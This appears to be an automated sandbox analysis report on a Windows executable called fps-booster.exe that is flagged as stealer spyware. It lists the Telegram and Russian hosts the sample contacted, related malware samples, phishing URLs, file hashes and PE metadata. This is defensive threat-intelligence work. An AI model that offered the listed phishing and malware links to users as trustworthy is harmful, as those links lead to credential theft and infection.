            		smallduck.ruRussian Federation
            		197349SKYLINEWIMAXRUfalse
            149.154.167.99
            		t.meUnited Kingdom
            		62041TELEGRAMRUfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1482549
            Start date and time:2024-07-26 01:13:38 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 33s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:fps-booster.exe
            Detection:MAL
            Classification:mal80.troj.spyw.evad.winEXE@5/8@2/2
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 77%
            • Number of executed functions: 70
            • Number of non-executed functions: 5
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 52.168.117.173
            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 6960 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • VT rate limit hit for: fps-booster.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            19:15:01API Interceptor7x Sleep call for process: fps-booster.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            149.154.167.99http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
            • telegram.org/
            http://telegramtw1.org/Get hashmaliciousUnknownBrowse
            • telegram.org/?setln=pl
            http://makkko.kz/Get hashmaliciousUnknownBrowse
            • telegram.org/
            http://telegram.dogGet hashmaliciousUnknownBrowse
            • telegram.dog/
            LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
            • t.me/cinoshibot
            jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
            • t.me/cinoshibot
            vSlVoTPrmP.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
            • t.me/cinoshibot
            RO67OsrIWi.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
            • t.me/cinoshibot
            KeyboardRGB.exeGet hashmaliciousUnknownBrowse
            • t.me/cinoshibot
            file.exeGet hashmaliciousCinoshi StealerBrowse
            • t.me/cinoshibot

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            t.meLisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
            • 149.154.167.99
            LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
            • 149.154.167.99
            LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
            • 149.154.167.99
            LisectAVT_2403002B_272.exeGet hashmaliciousPureLog Stealer, VidarBrowse
            • 149.154.167.99
            LisectAVT_2403002B_344.exeGet hashmaliciousBdaejec, VidarBrowse
            • 149.154.167.99
            Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
            • 149.154.167.99
            LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
            • 188.114.96.3
            LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
            • 188.114.97.3
            LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
            • 149.154.167.99
            LisectAVT_2403002C_67.exeGet hashmaliciousPureLog Stealer, VidarBrowse
            • 149.154.167.99

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TELEGRAMRUfile.exeGet hashmaliciousUnknownBrowse
            • 149.154.167.220
            file.exeGet hashmaliciousUnknownBrowse
            • 149.154.167.220
            file.exeGet hashmaliciousUnknownBrowse
            • 149.154.167.220
            http://jolly-figolla-4c9551.netlify.app/Get hashmaliciousUnknownBrowse
            • 149.154.167.99
            LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
            • 149.154.167.220
            LisectAVT_2403002A_138.exeGet hashmaliciousVidarBrowse
            • 149.154.167.99
            LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
            • 149.154.167.99
            LisectAVT_2403002A_425.dllGet hashmaliciousUnknownBrowse
            • 149.154.167.99
            LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
            • 149.154.167.220
            New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 149.154.167.220
            SKYLINEWIMAXRUgO6RAJaFXe.elfGet hashmaliciousMiraiBrowse
            • 91.105.196.153
            https://sbatlahfirahfoudggetgd.blob.core.windows.net/sbatlahfirahfoudggetgd/1.html?4x7m3FDkTJEczP1p2GRZZoiIdhHjYH24UjAz6N4wmzBMUGDTAWle1uoy4RUBNdG4utah6kZSk2nPrPIYhawSIHt5qk2ermrWyswH#cl/26427_md/7/21449/5023/19036/1614238Get hashmaliciousHTMLPhisherBrowse
            • 217.78.233.95
            https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
            • 217.78.233.95
            WGHFgjyKDE.elfGet hashmaliciousUnknownBrowse
            • 91.105.196.132
            https://shoutout.wix.com/so/d9OnulLek/c?w=aBwtj3vLyIt1v_BcFl1lIQUYUnO7j56NqO9d_ZxCWaE.eyJ1IjoiaHR0cHM6Ly84OG5iLmNjL3p2OGNvIiwiciI6ImQ5MjMyOTE1LTc5ZTMtNGQ2ZC05NmQ0LTQ3NTY4NWFlZmRjOCIsIm0iOiJtYWlsIiwiYyI6IjAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMCJ9Get hashmaliciousPhisherBrowse
            • 217.78.233.217
            https://asixvsakcsvcvoyiuy.blob.core.windows.net/asixvsakcsvcvoyiuy/url.htmlGet hashmaliciousHTMLPhisherBrowse
            • 217.78.233.133
            https://hhhfudijdu345jdfjj.blob.core.windows.net/hhhfudijdu345jdfjj/unsb.htmlGet hashmaliciousUnknownBrowse
            • 217.78.233.133
            https://hdjsgytzdijlko.blob.core.windows.net/hdjsgytzdijlko/url.htmlGet hashmaliciousPhisherBrowse
            • 217.78.233.133
            https://hhuuujjjfzjdsduj.blob.core.windows.net/hhuuujjjfzjdsduj/url.htmlGet hashmaliciousPhisherBrowse
            • 217.78.233.133
            https://come.to/wasda5Get hashmaliciousGRQ Scam, PhisherBrowse
            • 217.78.233.133

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0ehttps://metamaskwalletexetention.webflow.io/Get hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            http://56edthdxfhbx.pages.dev/Get hashmaliciousTechSupportScamBrowse
            • 217.78.239.114
            • 149.154.167.99
            https://banco.estado-app.comGet hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            http://contact-office-kawai9lpoe9srsi9lpoe9srsi.narymar.com/Get hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            http://gentle-union.wordsowd.workers.dev/Get hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            https://verify-metamask.simple-url.com/nkbihfbeogaeaoehlefnkodbefknnfbfzeygdsGet hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            http://walletdappsync.com/Get hashmaliciousUnknownBrowse
            • 217.78.239.114
            • 149.154.167.99
            LisectAVT_2403002A_124.exeGet hashmaliciousAgentTeslaBrowse
            • 217.78.239.114
            • 149.154.167.99
            LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
            • 217.78.239.114
            • 149.154.167.99
            LisectAVT_2403002A_133.exeGet hashmaliciousAgentTeslaBrowse
            • 217.78.239.114
            • 149.154.167.99

            Dropped Files

            No context

            Created / dropped Files

            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fps-booster.exe_765fda3b2bd5e1a4050f9bae0a354c4be4d80_a0bbb06f_ba88d234-ddb8-403f-8a3a-de2f14026868\Report.wer

            Download File
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):1.36323561567183
            Encrypted:false
            SSDEEP:192:8uVGHJsv2990BU/iaGtvzpVUW5zuiFpZ24IO8z:VGpslBU/iaQrUW5zuiFpY4IO8z
            MD5:2BE0997710331AD904FC0A99C9D489E6
            SHA1:A8FF963BC9E779E59482B62E5DA921CFF41B3418
            SHA-256:B1C60AA48CE36EC6DC33B481BB6997878E63D20E4EAB97A790E58817925F9A85
            SHA-512:EB220F0E31F329088C939E8F10BD7A696221EEC0D262E4B5F95EBAEA00EAE02A587DDAB5E2E1E5505B620F9A3BEEEACF3924631CF575DDFE78DD7F0689AACA3D
            Malicious:true
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.2.8.7.2.1.3.7.7.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.2.8.7.3.1.5.3.3.6.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.8.8.d.2.3.4.-.d.d.b.8.-.4.0.3.f.-.8.a.3.a.-.d.e.2.f.1.4.0.2.6.8.6.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.4.7.0.9.4.3.-.1.4.a.a.-.4.d.3.d.-.8.f.d.3.-.3.7.d.2.3.e.7.c.7.4.4.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.p.s.-.b.o.o.s.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.g.i.l.r.f.d.i.r.5.l.7.g.s.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.d.0.-.0.0.0.1.-.0.0.1.5.-.a.0.1.1.-.c.1.6.4.e.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.5.e.e.a.1.2.8.5.e.d.1.d.f.d.4.0.e.c.7.9.9.8.1.5.9.0.1.a.5.c.6.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.c.b.9.d.a.8.0.7.8.1.a.c.6.2.7.2.5.b.3.4.f.7.b.a.7.3.b.

            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA8F.tmp.dmp

            Download File
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 23:14:32 2024, 0x1205a4 type
            Category:dropped
            Size (bytes):440275
            Entropy (8bit):3.365379742744488
            Encrypted:false
            SSDEEP:3072:/YWEDKbXSu0NstApkELLB7ZO4uEqGLTgIaFpvyJB4Vo:/YPD+VhtACELO47Tgfvy
            MD5:A86D68C067A9EC12C1EE5BEC5E9DB272
            SHA1:DC9FF2F5610DCDDED1E2E56F872D4A5B4BEF64A3
            SHA-256:F2DD176C8527452E1DBCCA83B470F347FE985CB920A08EF69D8C42935003BCC4
            SHA-512:E6E0ACBF3AF7E157C14A8C8B80C2CBE559E16DBAED471FE4B9CA40C3124022F4BBD69C9FB3FBA3F75781A08883B977F5CFF1E328B1D0C48FB36F0BD62197D7B7
            Malicious:false
            Reputation:low
            Preview:MDMP..a..... .......X.f............T............)..h.......$...05.......5..p...........`.......8...........T...........xj..[M..........T5..........@7..............................................................................eJ.......7......GenuineIntel............T...........R.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDAD.tmp.WERInternalMetadata.xml

            Download File
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8424
            Entropy (8bit):3.6922358710061935
            Encrypted:false
            SSDEEP:192:R6l7wVeJuP6wL6Y2DVSU9BbSrgmfZUc6prr89brHsfL5m:R6lXJ26wL6Y4SU99SrgmfWcDrMfY
            MD5:BA9F68E8EBCCF776555428A383C5BAEE
            SHA1:D3D2815C4217118D789C26A1B5D309352A894C44
            SHA-256:BB6E2823BFE94DCD5B1593CF974BF35FE3ADFB7DB76C87637629E23137667102
            SHA-512:CA9E3795E1DBD4AC3C4CA9A27BC6F3A3CF72D2E99F872AA24BC670F8F5FD9CABA3919F9E7D0CD46921167D6F2A83D5B15C90D6C83D0959417A07DF8641C6999D
            Malicious:false
            Reputation:low
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.8.8.<./.P.i.

            C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDDD.tmp.xml

            Download File
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4778
            Entropy (8bit):4.460440503616698
            Encrypted:false
            SSDEEP:48:cvIwWl8zsPJg77aI9VyWpW8VY/Ym8M4JmpKFr+q8vSplG4q+vd:uIjfxI7TT7V3JuoKql1hvd
            MD5:DA64D4F0452356C5A0DC3BE7467BBF0D
            SHA1:4D97B2463A13FA6F2374CE28F73A06C2F716533B
            SHA-256:CA60F4D9B490B5E4EFF16BB77CF8CBF0961F6F1ABA02665D8C5630ED89321B09
            SHA-512:D9B0735D648667A76C014CA6B6C2CC0D5A9D2DBECB00C0F62B0D128F0E99A329DBC833BD8FB91D9EB23A5622ED0B53D9514FEFA7C91E6D5B2F8854C4FC92753C
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427097" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):1240
            Entropy (8bit):5.364593882999565
            Encrypted:false
            SSDEEP:24:3oWSKco4KmZjKbm51s4RPzIld6moUP7mZ9tXt/NK3R8W9yD:4WSU4xymI4RU9oUP7mZ9tlNWR8uO
            MD5:BE1AF8BD06D8855FD35D3A9C0F608140
            SHA1:A134C2A37D5A6F49B10A1E016CED16502971CBEF
            SHA-256:36178A70CA415E5089C102EC9B506DE5A586C6E0B4C416AF1F3696890903BCDE
            SHA-512:5EE5586810C6D6101EB80147BBB3B8A707AB8DF3E7FDE7A571EFD63922637A66772824EC40326654660CD2B4C7268BFFF80ED1993F5F6112602DB78FDA0C8411
            Malicious:false
            Reputation:low
            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ektdv54i.d2u.psm1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmqbeask.pso.ps1

            Download File
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Windows\appcompat\Programs\Amcache.hve

            Download File
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.4688822708812035
            Encrypted:false
            SSDEEP:6144:kzZfpi6ceLPx9skLmb0fvZWSP3aJG8nAgeiJRMMhA2zX4WABluuNgjDH5S:KZHtvZWOKnMM6bFpWj4
            MD5:1DCA0A0F990D02D821FBBF6FCFFF1DC8
            SHA1:6830B891DD41125264F2766C1E19C274E3C907FC
            SHA-256:072313E46E01C5A8B4D14A65079D746043CB5BEE5F5F6FA1090E904D27FF506C
            SHA-512:9380A08078E233A696A18609E8361677E96B61665C074F6F344CC9FD382EA17E81D7CC86BF02A1D7289FCAD256DFC7EA58012A09F17CAF5D994FB05191D6FF32
            Malicious:false
            Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...h................................................................................................................................................................................................................................................................................................................................................LG.\........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.995939480820394
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            • Win32 Executable (generic) a (10002005/4) 49.78%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            File name:fps-booster.exe
            File size:1'021'952 bytes
            MD5:913b3caeab0b292da088ea75c53ac17e
            SHA1:67cb9da80781ac62725b34f7ba73b8267ba767cd
            SHA256:9cfc821a019cfefcd580ae7bd6152438b3447e2a7a45e68c6d0cb4227fc8da21
            SHA512:e5e750b607412a8eeff8fe47a6e080d9f07b47aba3024c888fff648331359830d5dd3c30064c671cbb49ea01cc84b094952a9c354b9d9d5933d6493a51914ae1
            SSDEEP:24576:F0OlMXLCkq66rPiFRwMS0MLEVopb4UcIXj7/jOVevqV3amUl8AD:COKbtf6Ti0MS7oVoB4U/jOYuKmUO
            TLSH:A625335D3ADFD23ED41992B4DEE4CB92A320D1FA3A1350D604C660E70E1B55B7816E73
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.kc..........".................~.... ........@.. ....................................`................................

            File Icon

            Icon Hash:00928e8e8686b000

            Static PE Info

            General

            Entrypoint:0x4faa7e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x636BCD3E [Wed Nov 9 15:54:38 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xfaa300x4b.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xfc0000x652.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xfe0000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000xf8a840xf8c00e98ecbb1b56e2241edcb185698c03685False0.9931935065954773data7.997901129081752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc0xfc0000x6520x800e78b85beaf0eba70b7d2d40b53de0fb5False0.33544921875data3.533484897502172IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xfe0000xc0x200c30dc950ed0679bee25630c1dc2d190aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_VERSION0xfc0a00x3c8data0.3956611570247934
            RT_MANIFEST0xfc4680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Network Behavior

            Suricata IDS Alerts

